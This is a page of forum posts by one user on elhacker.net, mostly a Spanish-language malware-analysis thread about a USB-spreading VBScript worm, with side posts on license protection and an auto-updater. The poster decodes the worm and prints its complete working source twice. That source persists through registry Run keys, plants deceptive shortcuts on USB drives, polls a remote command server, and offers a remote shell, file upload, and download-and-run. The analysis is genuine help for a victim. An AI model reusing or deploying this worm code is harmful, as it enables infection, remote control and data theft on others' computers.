elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 [43] 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 ... 102
421  Programación / .NET (C#, VB.NET, ASP) / Re: Sistema de login muy seguro en: 17 Octubre 2013, 14:31 pm
No me he explicado bien.

Tu sistema es bueno, pero también se puede "crackear" a parte que su implantación tiene un coste de gestión elevadísimo si lo extrapolamos a gran escala (Necesitas tener la capacidad de generar una copia única cifrada para cada cliente, así como su HWID y su contraseña. Cada actualización que realices supone modificar el 100% de las licencias distribuidas a clientes, etc...). Por no hablar que limitas el uso de la aplicación a clientes con Internet permanente.

En cuanto un cliente legítimo realice la validación, el server envía la contraseña y se des-cifra el ejecutable, no? En ese momento el cliente puede dumpear el ejecutable des-cifrado y almacenar una copia del software sin "protección", pudiendo distribuirla por la red libremente.
422  Programación / Programación Visual Basic / Re: [APP & SOURCE] Smart Updater - Añade un auto-actualizador a tus programas FACIL en: 17 Octubre 2013, 14:24 pm
Amigo una ultima petición y no te fastidio mas  :-[ como tengo que hacerlo, para que aparezca el actualizador automáticamente, cuando haya una nueva versión??

Es decir que el programa se ejecute en segundo plano, verifique si hay actualización, si hay se lanza el mensaje de que hay nuevas actualizaciones y si no hay, que el actualizador se cierre y continué todo normal.

Si es mucho trabajo, no te preocupes, con lo que hiciste estoy muy contento  ;-)
Hay que hacer algunas modificaciones, se me ocurre lo siguiente:

Subir a tu FTP un archivo llamado version.txt dentro del fichero poner por ejemplo 1.1
El ejecutable principal de tu programa tendrá almacenada su versión actual, por ejemplo 1.0. El programa descarga el fichero version.txt y compara el 1.1 con 1.0, al ser distintos lanza un mensaje para que se active el lanzador. Te lo voy a escribir en pseudo-codigo:

Código
  1. Sub Main()
  2. MyVersion = "1.0"
  3. FTP_Version = DownloadFile("version.txt")
  4. If MyVersion <> FTP_Version Then
  5.  If MsgBox "Hay una nueva version, deseas actualizar?" = vbYes Then
  6.   Shell "smartupdater.exe /auto"
  7.   End
  8.  End If
  9. End Sub
  10.  

Sería eso a groso modo, evidentemente tienes que codearlo bien, con su sintaxis y todo. De todas fromas (sin acritud) desconozco ese "proyecto" importante que estás haciendo, pero si no eres capaz ni de programar una función similar... significa que no debe ser un "proyecto importante" como dices xD

He leído varios posts tuyos y tienes dudas de nivel-1. No quieras empezar una casa por el tejado :D
423  Seguridad Informática / Análisis y Diseño de Malware / Re: Infeccion de USB y equipo por "fyzbnaksvu..vbs" en: 16 Octubre 2013, 22:16 pm
Bueno, visto que nadie se ha animado, me dispongo a realizar yo mismo el análisis de éste "virus".

Es algo parecido a una botnet, el virus infecta el equipo y espera recibir ordenes y acciones que atacante emite a través de una web. El virus "escucha" las acciones que debe ejecutar en el PC infectado consultando la siguiente url:

update-flash.servehttp.com:666

Se instala en la startupfolder, por ejemplo: C:\Users\%USER%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\virus.vbs

El virus manda el comando "is-ready" para decirle al atacante que ya está instalado y a la espera de ejecutar ordenes. El atacante puede emitir los siguientes comandos:

case "excecute"
case "update"
case "uninstall"
case "send"
case "site-send"
case "recv"
case  "enum-driver"
case  "enum-faf"
case  "enum-process"
case  "cmd-shell"
case  "delete"
case  "exit-process"
case  "sleep"

El nombre de cada comando es bastante significativo, y me llama la atención el comando "unistall". Si el programador lo ha hecho bien, ejecuta manualmente la función "unistall" y deberás quedar desinfectado de éste virus de forma automática, una forma de hacerlo es ejecutando el siguiente código VBS:

Código
  1. host = "update-flash.servehttp.com"
  2. port = 666
  3. installdir = "%temp%"
  4. lnkfile = true
  5. lnkfolder = true
  6.  
  7. dim shellobj
  8. set shellobj = wscript.createobject("wscript.shell")
  9. dim filesystemobj
  10. set filesystemobj = createobject("scripting.filesystemobject")
  11. dim httpobj
  12. set httpobj = createobject("msxml2.xmlhttp")
  13.  
  14.  
  15. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
  16.  
  17. installname = wscript.scriptname
  18. startup = shellobj.specialfolders ("startup") & "\"
  19. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  20. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  21. spliter = "<" & "|" & ">"
  22. sleep = 5000
  23. dim response
  24. dim cmd
  25. dim param
  26. info = ""
  27. usbspreading = ""
  28. startdate = ""
  29. dim oneonce
  30.  
  31. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
  32. on error resume next
  33. dim filename
  34. dim foldername
  35.  
  36. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  37. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  38. filesystemobj.deletefile startup & installname ,true
  39. filesystemobj.deletefile wscript.scriptfullname ,true
  40.  
  41. for  each drive in filesystemobj.drives
  42. if  drive.isready = true then
  43. if  drive.freespace  > 0 then
  44. if  drive.drivetype  = 1 then
  45.    for  each file in filesystemobj.getfolder ( drive.path & "\").files
  46.         on error resume next
  47.         if  instr (file.name,".") then
  48.             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  49.                 file.attributes = 0
  50.                 if  ucase (file.name) <> ucase (installname) then
  51.                     filename = split(file.name,".")
  52.                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  53.                 else
  54.                     filesystemobj.deletefile (drive.path & "\" & file.name)
  55.                 end If
  56.             else
  57.                 filesystemobj.deletefile (file.path)
  58.             end if
  59.         end if
  60.     next
  61.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  62.         folder.attributes = 0
  63.     next
  64. end if
  65. end if
  66. end if
  67. next
  68. msgbox "desinfectado"
  69. wscript.quit

Dime si te ha funcionado. Saludos!! :D
424  Programación / Programación Visual Basic / Re: ¿Existe este componente para vb6? en: 16 Octubre 2013, 17:25 pm
Hay muchos controles de usuario (componentes para VB6) en la red, desconozco si ese en concreto existe o está disponible. Lo que sí puedo adelantarte es que VB6 permite diseñar tus propios controles de usuario, dependiendo de tu nivel, experiencia y dedicación puedes llegar a programar algo similar (o incluso mejor).

De todas formas, juzgando por la foto, creo que no han usado ningún control personalizado, creo que solo es un bonito diseño en photoshop, AlphaBend y sustitución de imágenes con el evento OnMouseMove
425  Programación / .NET (C#, VB.NET, ASP) / Re: Sistema de login muy seguro en: 16 Octubre 2013, 14:13 pm
Pues yo tengo una solución verdaderamente segura, con la que es 99.9% imposible crackear tu aplicación.

Primero: encriptas el .exe compilado de tu programa con algún cifrado con contraseña (tipo AES, así, el archivo varía según la contraseña, por lo tanto, es imposible recuperar el archivo original sin esa contraseña)

Luego, creas un "loader" que se encargará de enviar el Hardware ID (HWID) al servidor.
En el servidor, compruebas que el HWID esté en la base de datos. Si lo está, envías la contraseña al cliente para que desencripte el programa original y se pueda ejecutar. Si no es un HWID que esté en tu base de datos de HWIDs válidos, envías una contraseña aleatoria y el archivo no podrá ser descifrado.

Esto es imposible de crackear (eso sí, si la contraseña es 12345, no esperes que dure mucho). Si pones una contraseña larga y jodida, nadie podrá jamás ejecutar ese código, ya que, para bruteforcear eso, necesitas muchísimos años de crackeo.

Ese sistema es bastante seguro, un servidor de licencias :)

Pero se puede "alterar" de varias formas dependiendo el modo en que implementes la protección. Por ejemplo un cliente que ya haga la validación HWID y tenga la aplicación descifrada, podrá volcar-lo en un nuevo fichero y distribuir la copia por la red (por ejemplo).

Per es cierto que un license-server es bastante seguro :)
426  Programación / Programación Visual Basic / Re: [APP & SOURCE] Smart Updater - Añade un auto-actualizador a tus programas FACIL en: 16 Octubre 2013, 12:22 pm
Amigo habra alguna manera de agregar una barra de progreso a medida que se descargan los archivos? Si es mucho trabjo no te preocupes.

Funciona perfecto amigo :D

una pregunta hay algún limite de tamaño para actualizar los archivos?? pretendo que se actualicen unos 400mb


saludos

Por la forma en que he programado el downloader no se puede agregar una barra de progreso. Lo que he añadido es un label que indica que fichero está descargando y cuando ha finalizado de descargar todos los ficheros. Se podría añadir una animación que indique al usuario que está descargando y que no desespere, así quedaría más bonito.

No hay ningún límite de descarga, si tienes que actualizar 400MB lo puedes hacer, lo mejor es que lo pruebes en tu PC primero. Smart Updater sirve tambien como FileIntegrityCheck. Si un fichero es borrado o modificado (aunque sea un bit) será actualizado por la comprobación CRC32, pruebalo y me cuentas :)
427  Seguridad Informática / Análisis y Diseño de Malware / Re: Infeccion de USB y equipo por "fyzbnaksvu..vbs" en: 16 Octubre 2013, 11:14 am
Hola, pues mi hermano trajo una USB y el no tiene mucha conciencia de las medidas de seguridad para abrir un dispositivo que ha estado en una maquina publica, la cosa es que se me infecto la computadora y pude llegar al culpable, es un script de visual basic llamado "fyzbnaksvu..vbs" (si, lleva 2 puntos)

Les pongo aqui el "codigo fuente" que encontre al abrie el vbs con bloc de notas:
(la pondre en pastebin, espero que en el foro ya implementen la opcion de poner spoilers o cajas de texto que me cortó cuando quise publicarlo en un bloque CODE)

http://pastebin.com/NH8nYxub

Si alguien puede decirme que hace y como deshacerme de el, le estaria muy agradecido, digo, acabo de formatear con W8 hace 5 dias y ya pasa esto? XD

Bueno, de antemano, muchas gracias. Saludos!

Hola!! Gracias por publicar semejante código, está muy bien programado y es interesante :P, el "virus" está enmascarado con 2 cifrados, el primero es una simple codificación ascii, se puede resolver añadiendo el siguiente código al final (quitando el EXECUTEGLOBAL):

Código
  1. Set fs = CreateObject("Scripting.FileSystemObject")
  2. Set a = fs.CreateTextFile("dump.txt", True)
  3. a.WriteLine(AAA)
  4. a.Close

El código devuelve un fichero llamado dump.txt con el primer "cifrado" resuelto:

Código
  1. ABC = deCrypt("'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "update-flash.servehttp.com"
port = 666
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
	 osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
		.type = 1 
		.open
		.write objhttpdownload.responsebody
		.savetofile strsaveto
		.close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
	set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
		 .type = 1 
		 .open
		 .write objhttpdownload.responsebody
		 .savetofile strsaveto
		 .close
	end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
	 .loadfromfile fileurl
	 buffer = .read
	 .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
	enumprocess = enumprocess & objitem.name & "|"
	enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function")
  2. EXECUTEGLOBAL (ABC)
  3. function deCrypt(data)
  4.     deCrypt=YYY(data)
  5. end function
  6. Function YYY(ByVal base64String)
  7.     Const ZZZ = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  8.     Dim dataLength, sOut, groupBegin
  9.  
  10.     base64String = Replace(base64String, vbCrLf, "")
  11.     base64String = Replace(base64String, vbTab, "")
  12.     base64String = Replace(base64String, " ", "")
  13.     dataLength = Len(base64String)
  14.     If dataLength Mod 4 <> 0 Then
  15.          Err.Raise 1, "Base64Decode", "Bad Base64 string."
  16.          Exit Function
  17.     End If
  18.     For groupBegin = 1 To dataLength Step 4
  19.          Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
  20.          numDataBytes = 3
  21.          nGroup = 0
  22.  
  23.          For CharCounter = 0 To 3
  24.               thisChar = Mid(base64String, groupBegin + CharCounter, 1)
  25.  
  26.               If thisChar = "=" Then
  27.                    numDataBytes = numDataBytes - 1
  28.                    thisData = 0
  29.               Else
  30.                    thisData = InStr(1, ZZZ, thisChar, vbBinaryCompare) - 1
  31.               End If

El contenido del "virus" está cifrado de nuevo con Base64, he añadido el siguiente código para descifrarlo:

Código
  1. Set fs = CreateObject("Scripting.FileSystemObject")
  2. Set a = fs.CreateTextFile("dump2.txt", True)
  3. a.WriteLine(ABC)
  4. a.Close

Y el resultado final es el "virus" completamente descifrado, el análisis te lo dejo para ti (o para otro usuario):

Código
  1. '<[ recoder : houdini (c) skype : houdini-fx ]>
  2.  
  3. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4.  
  5. host = "update-flash.servehttp.com"
  6. port = 666
  7. installdir = "%temp%"
  8. lnkfile = true
  9. lnkfolder = true
  10.  
  11. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
  12.  
  13. dim shellobj
  14. set shellobj = wscript.createobject("wscript.shell")
  15. dim filesystemobj
  16. set filesystemobj = createobject("scripting.filesystemobject")
  17. dim httpobj
  18. set httpobj = createobject("msxml2.xmlhttp")
  19.  
  20.  
  21. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
  22.  
  23. installname = wscript.scriptname
  24. startup = shellobj.specialfolders ("startup") & "\"
  25. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  26. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  27. spliter = "<" & "|" & ">"
  28. sleep = 5000
  29. dim response
  30. dim cmd
  31. dim param
  32. info = ""
  33. usbspreading = ""
  34. startdate = ""
  35. dim oneonce
  36.  
  37. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
  38. on error resume next
  39.  
  40.  
  41. instance
  42. while true
  43.  
  44. install
  45.  
  46. response = ""
  47. response = post ("is-ready","")
  48. cmd = split (response,spliter)
  49. select case cmd (0)
  50. case "excecute"
  51.      param = cmd (1)
  52.      execute param
  53. case "update"
  54.      param = cmd (1)
  55.      oneonce.close
  56.      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
  57.      oneonce.write param
  58.      oneonce.close
  59.      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  60.      wscript.quit
  61. case "uninstall"
  62.      uninstall
  63. case "send"
  64.      download cmd (1),cmd (2)
  65. case "site-send"
  66.      sitedownloader cmd (1),cmd (2)
  67. case "recv"
  68.      param = cmd (1)
  69.      upload (param)
  70. case  "enum-driver"
  71.      post "is-enum-driver",enumdriver  
  72. case  "enum-faf"
  73.      param = cmd (1)
  74.      post "is-enum-faf",enumfaf (param)
  75. case  "enum-process"
  76.      post "is-enum-process",enumprocess  
  77. case  "cmd-shell"
  78.      param = cmd (1)
  79.      post "is-cmd-shell",cmdshell (param)  
  80. case  "delete"
  81.      param = cmd (1)
  82.      deletefaf (param)
  83. case  "exit-process"
  84.      param = cmd (1)
  85.      exitprocess (param)
  86. case  "sleep"
  87.      param = cmd (1)
  88.      sleep = eval (param)        
  89. end select
  90.  
  91. wscript.sleep sleep
  92.  
  93. wend
  94.  
  95.  
  96. sub install
  97. on error resume next
  98. dim lnkobj
  99. dim filename
  100. dim foldername
  101. dim fileicon
  102. dim foldericon
  103.  
  104. upstart
  105. for each drive in filesystemobj.drives
  106.  
  107. if  drive.isready = true then
  108. if  drive.freespace  > 0 then
  109. if  drive.drivetype  = 1 then
  110.    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  111.    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
  112.        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
  113.    end if
  114.    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  115.        if not lnkfile then exit for
  116.        if  instr (file.name,".") then
  117.            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  118.                file.attributes = 2+4
  119.                if  ucase (file.name) <> ucase (installname) then
  120.                    filename = split(file.name,".")
  121.                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
  122.                    lnkobj.windowstyle = 7
  123.                    lnkobj.targetpath = "cmd.exe"
  124.                    lnkobj.workingdirectory = ""
  125.                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  126.                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  127.                    if  instr (fileicon,",") = 0 then
  128.                        lnkobj.iconlocation = file.path
  129.                    else
  130.                        lnkobj.iconlocation = fileicon
  131.                    end if
  132.                    lnkobj.save()
  133.                end if
  134.            end if
  135.        end if
  136.    next
  137.    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  138.        if not lnkfolder then exit for
  139.        folder.attributes = 2+4
  140.        foldername = folder.name
  141.        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
  142.        lnkobj.windowstyle = 7
  143.        lnkobj.targetpath = "cmd.exe"
  144.        lnkobj.workingdirectory = ""
  145.        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  146.        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  147.        if  instr (foldericon,",") = 0 then
  148.            lnkobj.iconlocation = folder.path
  149.        else
  150.            lnkobj.iconlocation = foldericon
  151.        end if
  152.        lnkobj.save()
  153.    next
  154. end If
  155. end If
  156. end if
  157. next
  158. err.clear
  159. end sub
  160.  
  161. sub uninstall
  162. on error resume next
  163. dim filename
  164. dim foldername
  165.  
  166. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  167. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  168. filesystemobj.deletefile startup & installname ,true
  169. filesystemobj.deletefile wscript.scriptfullname ,true
  170.  
  171. for  each drive in filesystemobj.drives
  172. if  drive.isready = true then
  173. if  drive.freespace  > 0 then
  174. if  drive.drivetype  = 1 then
  175.    for  each file in filesystemobj.getfolder ( drive.path & "\").files
  176.         on error resume next
  177.         if  instr (file.name,".") then
  178.             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  179.                 file.attributes = 0
  180.                 if  ucase (file.name) <> ucase (installname) then
  181.                     filename = split(file.name,".")
  182.                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  183.                 else
  184.                     filesystemobj.deletefile (drive.path & "\" & file.name)
  185.                 end If
  186.             else
  187.                 filesystemobj.deletefile (file.path)
  188.             end if
  189.         end if
  190.     next
